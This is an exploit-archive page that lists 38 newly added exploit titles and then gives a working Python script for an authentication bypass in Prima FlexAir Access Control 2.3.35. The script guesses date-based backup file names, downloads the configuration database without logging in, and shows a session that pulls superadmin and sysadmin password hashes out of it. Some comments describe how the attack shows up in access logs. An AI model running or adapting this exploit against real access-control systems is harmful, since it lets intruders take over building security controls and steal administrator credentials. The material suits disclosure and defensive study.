
38 changes to exploits/shellcodes Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH) Wondershare Application Framework Service - _WsAppService_ Unquote Service Path eMerge E3 Access Controller 4.6.07 - Remote Code Execution eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit) CBAS-Web 19.0.0 - Information Disclosure Prima FlexAir Access Control 2.3.38 - Remote Code Execution Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting eMerge E3 1.00-06 - Unauthenticated Directory Traversal eMerge E3 1.00-06 - Privilege Escalation eMerge E3 1.00-06 - Remote Code Execution eMerge E3 1.00-06 - Cross-Site Request Forgery Atlassian Confluence 6.15.1 - Directory Traversal eMerge E3 1.00-06 - Arbitrary File Upload eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting eMerge50P 5000P 4.6.07 - Remote Code Execution CBAS-Web 19.0.0 - Remote Code Execution CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin) CBAS-Web 19.0.0 - Username Enumeration CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection Joomla 3.9.13 - 'Host' Header Injection Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting Prima Access Control 2.3.35 - Arbitrary File Upload Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit) Optergy 2.3.0a - Remote Code Execution FlexAir Access Control 2.4.9api3 - Remote Code Execution Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin) Optergy 2.3.0a - Username Disclosure Optergy 2.3.0a - Remote Code Execution 
(Backdoor) Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting FlexAir Access Control 2.3.35 - Authentication Bypass Bematech Printer MP-4200 - Denial of Service
# Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7666, CVE-2019-7667
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
# Authentication Bypass (Login with MD5 hash)
#
# Older versions: /links/Nova_Config_2019-01-03.bck
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
# Fixed versions: 2.4
#
###################################################################################
#
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
# [+] Please wait while fetchin the backup config file...
# [+] Found some juice!
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
# SQLite version 3.22.0 2018-01-22 18:45:57
# Enter ".help" for usage hints.
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
# sqlite> .q
# lqwrm@metalgear:~/stuff/prima$
#
###################################################################################
#
# 11.01.2019
#

import os#######
import sys######
import time#####
import requests#
from datetime import timedelta, date
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence the InsecureRequestWarning that requests would otherwise emit for
# every verify=False call made later in this script.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Script name as it should appear in the usage text (argv[0] without its directory).
piton = os.path.basename(sys.argv[0])

# Exactly one positional argument is expected: the base URL of the target.
# Without it, show the usage text and exit with status 0.
if len(sys.argv) <= 1:
    print('[+] Usage: %s [target]' % piton)
    print('[+] Target example 1: http://10.0.0.17:8080')
    print('[+] Target example 2: https://primanova.tld\n')
    sys.exit()

# Base URL (scheme, host and port); request paths are appended to it verbatim.
host = sys.argv[1]
def datum(start_date, end_date):
    """Yield every date from start_date (inclusive) up to end_date (exclusive).

    Dates are produced one calendar day apart. Nothing is yielded when
    end_date is on or before start_date.
    """
    span_days = (end_date - start_date).days
    for offset in range(span_days):
        yield start_date + timedelta(days=offset)
# Date window searched for a backup file name: first day inclusive, last day
# exclusive, which is 1093 candidate days in total.
start_date = date(2017, 1, 1)
end_date = date(2019, 12, 30)

print('[+] Please wait while fetchin the backup config file...')
def spinning_cursor():
    """Endlessly yield the four spinner frames '|', '/', '-', '\\' in turn.

    The generator never terminates; the caller pulls one frame per
    iteration with next() to draw a simple progress indicator.
    """
    frames = '|/-\\'
    index = 0
    while True:
        yield frames[index]
        index = (index + 1) % len(frames)
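spinner = spinning_cursor()

# Probe one candidate backup name per calendar day in [start_date, end_date):
# an unauthenticated GET of /links/Nova_Config_YYYY-MM-DD.bck.  The first
# response with status 200 is treated as the backup and its body is written
# to the current directory; the loop then exits.  Because of the 0.1 s pause
# this is about ten requests per second for up to 1093 days, so a run is
# visible in the target's access log as a sustained burst of requests for
# that path pattern, nearly all of them non-200 — a usable detection signature.
for mooshoo in datum(start_date, end_date):
    sys.stdout.write(next(spinner))
    sys.stdout.flush()
    time.sleep(0.1)
    sys.stdout.write('\b')

    # Format the date once; the original rebuilt the same string three times.
    backup_name = 'Nova_Config_' + mooshoo.strftime('%Y-%m-%d') + '.bck'
    url = host + '/links/' + backup_name
    # verify=False skips certificate validation (the matching warning is
    # silenced at the top of the file), so on an https target the content
    # accepted below is not authenticated to the server.
    h = requests.get(url, verify=False)

    # Any 200 counts as a hit; the body is not inspected before being saved,
    # so a site that answers unknown paths with a 200 page produces a false
    # positive.
    if h.status_code == 200:
        print('[+] Found some juice!')
        print('[+] Downloading: ' + url)
        timestr = time.strftime('%H%M%S')
        time.sleep(1)
        outfile = backup_name + '-' + timestr + '.db'
        # The original wrote through an unclosed file object; the with-block
        # flushes and closes the handle before sys.exit() runs.
        with open(outfile, 'wb') as fh:
            fh.write(h.content)
        print('[+] Saved as: ' + outfile)
        sys.exit()

print('[-] No backup for you today. :(')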